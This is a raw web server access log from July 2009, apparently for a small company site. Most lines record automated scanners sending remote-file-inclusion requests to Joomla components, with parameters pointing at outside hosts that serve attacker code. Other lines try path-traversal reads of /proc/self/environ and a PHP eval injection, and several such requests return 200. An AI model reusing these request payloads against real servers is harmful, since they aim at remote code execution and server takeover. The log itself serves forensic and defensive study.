59.22.140.17 - - [13/Jul/2009:05:20:12 -0400] "GET /logs/access_log.Q109060800%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
211.234.107.233 - - [13/Jul/2009:05:20:18 -0400] "GET /logs/access_log.Q109052200/support/mailling/maillist/inc/initdb.php?absolute_path=http://www.fotoplus.su//assets/images/magaz/id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
211.234.107.233 - - [13/Jul/2009:05:21:09 -0400] "GET /logs/access_log.Q109052200/support/mailling/maillist/inc/initdb.php?absolute_path=http://www.fotoplus.su//assets/images/magaz/id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
211.234.107.233 - - [13/Jul/2009:05:21:17 -0400] "GET /logs/access_log.Q109052200/support/mailling/maillist/inc/initdb.php?absolute_path=http://www.fotoplus.su//assets/images/magaz/id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
59.22.140.17 - - [13/Jul/2009:05:21:19 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:05:21:19 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:05:21:20 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
83.170.112.243 - - [13/Jul/2009:05:21:45 -0400] "GET /errors.php?error=http://intranet.esc-clermont.fr///components/com_login/idste.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
83.170.112.243 - - [13/Jul/2009:05:22:17 -0400] "GET /logs/access_log.Q109061700/errors.php?error=http://intranet.esc-clermont.fr///components/com_login/idste.txt? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
83.170.112.243 - - [13/Jul/2009:05:22:17 -0400] "GET /errors.php?error=http://intranet.esc-clermont.fr///components/com_login/idste.txt? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.249.68.247 - - [13/Jul/2009:05:22:47 -0400] "GET /logs/error_log.Q109030900 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
59.22.140.17 - - [13/Jul/2009:05:22:51 -0400] "GET /logs/access_log.Q109060800/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
83.170.112.243 - - [13/Jul/2009:05:23:21 -0400] "GET /logs/access_log.Q109060400/errors.php?error=http://intranet.esc-clermont.fr///components/com_login/idste.txt? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
209.59.12.99 - - [13/Jul/2009:05:23:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.205.57.2 - - [13/Jul/2009:05:24:02 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mj.sc.kr/member/readme.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
210.205.57.2 - - [13/Jul/2009:05:24:03 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mj.sc.kr/member/readme.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
117.74.99.225 - - [13/Jul/2009:05:24:43 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
117.74.99.225 - - [13/Jul/2009:05:24:43 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
117.74.99.225 - - [13/Jul/2009:05:24:45 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
218.232.66.36 - - [13/Jul/2009:05:24:59 -0400] "GET /logs/access_log.Q109051700//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.232.66.36 - - [13/Jul/2009:05:24:59 -0400] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.232.66.36 - - [13/Jul/2009:05:24:59 -0400] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
218.232.66.36 - - [13/Jul/2009:05:25:52 -0400] "GET /logs/access_log.Q109053100//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
117.74.99.225 - - [13/Jul/2009:05:26:23 -0400] "GET /logs/access_log.Q109062700%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
83.170.112.243 - - [13/Jul/2009:05:28:03 -0400] "GET /logs/access_log.Q109060400/errors.php?error=http://intranet.esc-clermont.fr///components/com_login/idste.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
83.170.112.243 - - [13/Jul/2009:05:28:05 -0400] "GET /errors.php?error=http://intranet.esc-clermont.fr///components/com_login/idste.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
83.170.112.243 - - [13/Jul/2009:05:28:06 -0400] "GET /logs/errors.php?error=http://intranet.esc-clermont.fr///components/com_login/idste.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
65.55.105.230 - - [13/Jul/2009:05:28:29 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.230 - - [13/Jul/2009:05:28:29 -0400] "GET /logs/error_log.Q107072100 HTTP/1.1" 404 223 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
209.59.12.99 - - [13/Jul/2009:05:28:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
219.94.194.231 - - [13/Jul/2009:05:28:41 -0400] "GET /logs//index.php?option=com_agora&task=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
219.94.194.231 - - [13/Jul/2009:05:28:41 -0400] "GET //index.php?option=com_agora&task=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
219.94.194.231 - - [13/Jul/2009:05:28:41 -0400] "GET /logs/access_log.Q109061200//index.php?option=com_agora&task=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
83.170.112.243 - - [13/Jul/2009:05:28:42 -0400] "GET /logs/error_log.Q109061700/errors.php?error=http://intranet.esc-clermont.fr///components/com_login/idste.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
219.94.194.231 - - [13/Jul/2009:05:28:42 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
219.94.194.231 - - [13/Jul/2009:05:28:42 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
219.94.194.231 - - [13/Jul/2009:05:28:42 -0400] "GET /logs/access_log.Q109061200/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
219.94.194.231 - - [13/Jul/2009:05:28:42 -0400] "GET //index.php?option=com_agora&task=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 208 "-" "XXXXXX"
219.94.194.231 - - [13/Jul/2009:05:28:42 -0400] "GET /logs//index.php?option=com_agora&task=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 213 "-" "XXXXXX"
219.94.194.231 - - [13/Jul/2009:05:28:42 -0400] "GET /logs/access_log.Q109061200//index.php?option=com_agora&task=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 235 "-" "XXXXXX"
219.94.194.231 - - [13/Jul/2009:05:28:43 -0400] "GET //index.php?option=com_agora&task=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "XXXXXX"
219.94.194.231 - - [13/Jul/2009:05:28:43 -0400] "GET /logs/access_log.Q109061200//index.php?option=com_agora&task=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "XXXXXX"
219.94.194.231 - - [13/Jul/2009:05:28:43 -0400] "GET /logs//index.php?option=com_agora&task=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "XXXXXX"
66.249.68.70 - - [13/Jul/2009:05:30:13 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0184CE46083492003A81031+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
219.94.194.231 - - [13/Jul/2009:05:31:18 -0400] "GET /logs/access_log.Q109060700//index.php?option=com_agora&task=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
219.94.194.231 - - [13/Jul/2009:05:31:19 -0400] "GET /logs/access_log.Q109060700/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
219.94.194.231 - - [13/Jul/2009:05:31:19 -0400] "GET /logs/access_log.Q109060700//index.php?option=com_agora&task=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 235 "-" "XXXXXX"
219.94.194.231 - - [13/Jul/2009:05:31:20 -0400] "GET /logs/access_log.Q109060700//index.php?option=com_agora&task=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "XXXXXX"
209.59.12.99 - - [13/Jul/2009:05:33:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
12.201.206.114 - - [13/Jul/2009:05:34:05 -0400] "GET /images/login_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
12.201.206.114 - - [13/Jul/2009:05:34:05 -0400] "GET /images/psearch_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
12.201.206.114 - - [13/Jul/2009:05:34:06 -0400] "GET /images/login_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
12.201.206.114 - - [13/Jul/2009:05:34:06 -0400] "GET /images/psearch_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
66.249.68.70 - - [13/Jul/2009:05:34:26 -0400] "GET /images/ACE_tissue_graft.pdf HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
117.74.99.225 - - [13/Jul/2009:05:34:31 -0400] "GET /logs/access_log.Q109061100//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
117.74.99.225 - - [13/Jul/2009:05:34:39 -0400] "GET /logs/access_log.Q109062700//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
218.232.66.36 - - [13/Jul/2009:05:36:11 -0400] "GET /logs/access_log.Q109051700%20%20//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
83.170.112.243 - - [13/Jul/2009:05:36:12 -0400] "GET /logs/access_log.Q109070300/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://intranet.esc-clermont.fr///components/com_login/idste.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
83.170.112.243 - - [13/Jul/2009:05:36:13 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://intranet.esc-clermont.fr///components/com_login/idste.txt? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
83.170.112.243 - - [13/Jul/2009:05:36:13 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://intranet.esc-clermont.fr///components/com_login/idste.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
218.232.66.36 - - [13/Jul/2009:05:36:21 -0400] "GET /logs/access_log.Q109053100%20%20//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:05:36:42 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:05:36:42 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
210.205.57.2 - - [13/Jul/2009:05:36:48 -0400] "GET /logs/access_log.Q109050800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mj.sc.kr/member/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
210.205.57.2 - - [13/Jul/2009:05:36:49 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mj.sc.kr/member/readme.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
210.205.57.2 - - [13/Jul/2009:05:36:50 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mj.sc.kr/member/readme.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
218.249.36.194 - - [13/Jul/2009:05:36:51 -0400] "GET /logs/access_log.Q109051600//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
80.93.48.103 - - [13/Jul/2009:05:37:46 -0400] "GET /logs/access_log.Q109050800/e404.php?DOCUMENT_ROOT=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
80.93.48.103 - - [13/Jul/2009:05:37:46 -0400] "GET /e404.php?DOCUMENT_ROOT=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 206 "-" "libwww-perl/5.803"
80.93.48.103 - - [13/Jul/2009:05:37:46 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 211 "-" "libwww-perl/5.803"
80.93.48.103 - - [13/Jul/2009:05:37:49 -0400] "GET /e404.php?DOCUMENT_ROOT=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 206 "-" "libwww-perl/5.803"
209.59.12.99 - - [13/Jul/2009:05:38:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.170.112.243 - - [13/Jul/2009:05:38:38 -0400] "GET /logs/access_log.Q109070100/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://intranet.esc-clermont.fr///components/com_login/idste.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
218.249.36.194 - - [13/Jul/2009:05:38:46 -0400] "GET /logs/access_log.Q109051000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
210.205.57.2 - - [13/Jul/2009:05:39:46 -0400] "GET /logs/access_log.Q109050800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mj.sc.kr/member/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
210.205.57.2 - - [13/Jul/2009:05:39:47 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mj.sc.kr/member/readme.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
210.205.57.2 - - [13/Jul/2009:05:39:47 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mj.sc.kr/member/readme.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
218.249.36.194 - - [13/Jul/2009:05:40:05 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:05:40:05 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:05:40:05 -0400] "GET /logs/access_log.Q109051600//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
80.93.48.103 - - [13/Jul/2009:05:40:47 -0400] "GET /logs/access_log.Q109051300/e404.php?DOCUMENT_ROOT=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
83.170.112.243 - - [13/Jul/2009:05:41:37 -0400] "GET /logs/access_log.Q109061300//?path%5Bdocroot%5D=http://intranet.esc-clermont.fr///components/com_login/idste.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
83.170.112.243 - - [13/Jul/2009:05:41:38 -0400] "GET //?path%5Bdocroot%5D=http://intranet.esc-clermont.fr///components/com_login/idste.txt? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
83.170.112.243 - - [13/Jul/2009:05:41:39 -0400] "GET /logs//?path%5Bdocroot%5D=http://intranet.esc-clermont.fr///components/com_login/idste.txt? HTTP/1.1" 200 9329 "-" "libwww-perl/5.805"
218.232.66.36 - - [13/Jul/2009:05:41:39 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://band.lizetteand.com/media/fid.txt?? HTTP/1.1" 404 264 "-" "libwww-perl/5.65"
218.232.66.36 - - [13/Jul/2009:05:41:39 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://band.lizetteand.com/media/fid.txt?? HTTP/1.1" 404 264 "-" "libwww-perl/5.65"
218.249.36.194 - - [13/Jul/2009:05:41:44 -0400] "GET /logs/access_log.Q109051000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
80.93.48.103 - - [13/Jul/2009:05:42:01 -0400] "GET /e404.php?DOCUMENT_ROOT=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 206 "-" "libwww-perl/5.803"
211.234.107.233 - - [13/Jul/2009:05:42:15 -0400] "GET /logs/access_log.Q109051100//?_zb_path=http://www.fotoplus.su//assets/images/magaz/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
211.234.107.233 - - [13/Jul/2009:05:42:16 -0400] "GET /logs//?_zb_path=http://www.fotoplus.su//assets/images/magaz/id.txt?? HTTP/1.1" 200 9329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
211.234.107.233 - - [13/Jul/2009:05:42:16 -0400] "GET //?_zb_path=http://www.fotoplus.su//assets/images/magaz/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
83.170.112.243 - - [13/Jul/2009:05:42:37 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://intranet.esc-clermont.fr///components/com_login/idste.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
211.234.107.233 - - [13/Jul/2009:05:43:21 -0400] "GET //?_zb_path=http://www.fotoplus.su//assets/images/magaz/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
211.234.107.233 - - [13/Jul/2009:05:43:21 -0400] "GET /logs/access_log.Q109051100//?_zb_path=http://www.fotoplus.su//assets/images/magaz/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
211.234.107.233 - - [13/Jul/2009:05:43:22 -0400] "GET /logs//?_zb_path=http://www.fotoplus.su//assets/images/magaz/id.txt?? HTTP/1.1" 200 9329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
209.59.12.99 - - [13/Jul/2009:05:43:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.249.36.194 - - [13/Jul/2009:05:44:00 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:05:44:02 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.232.66.36 - - [13/Jul/2009:05:44:07 -0400] "GET /logs/access_log.Q109062100/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://band.lizetteand.com/media/fid.txt?? HTTP/1.1" 404 291 "-" "libwww-perl/5.65"
218.232.66.36 - - [13/Jul/2009:05:44:08 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://band.lizetteand.com/media/fid.txt?? HTTP/1.1" 404 264 "-" "libwww-perl/5.65"
218.232.66.36 - - [13/Jul/2009:05:44:08 -0400] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://band.lizetteand.com/media/fid.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.65"
218.232.66.36 - - [13/Jul/2009:05:44:34 -0400] "GET /logs/access_log.Q109062100/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://band.lizetteand.com/media/fid.txt?? HTTP/1.1" 404 291 "-" "libwww-perl/5.65"
218.232.66.36 - - [13/Jul/2009:05:44:35 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://band.lizetteand.com/media/fid.txt?? HTTP/1.1" 404 264 "-" "libwww-perl/5.65"
218.232.66.36 - - [13/Jul/2009:05:44:35 -0400] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://band.lizetteand.com/media/fid.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.65"
66.249.68.70 - - [13/Jul/2009:05:44:38 -0400] "GET /images/items/8650800_thumb.jpg HTTP/1.1" 200 4957 "-" "Googlebot-Image/1.0"
218.249.36.194 - - [13/Jul/2009:05:44:57 -0400] "GET /logs/access_log.Q109051000%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:05:44:58 -0400] "GET /logs/access_log.Q109051000%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
210.205.57.2 - - [13/Jul/2009:05:45:24 -0400] "GET /logs/access_log.Q109061100//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mj.sc.kr/member/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
210.205.57.2 - - [13/Jul/2009:05:47:37 -0400] "GET /logs/access_log.Q109061100//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mj.sc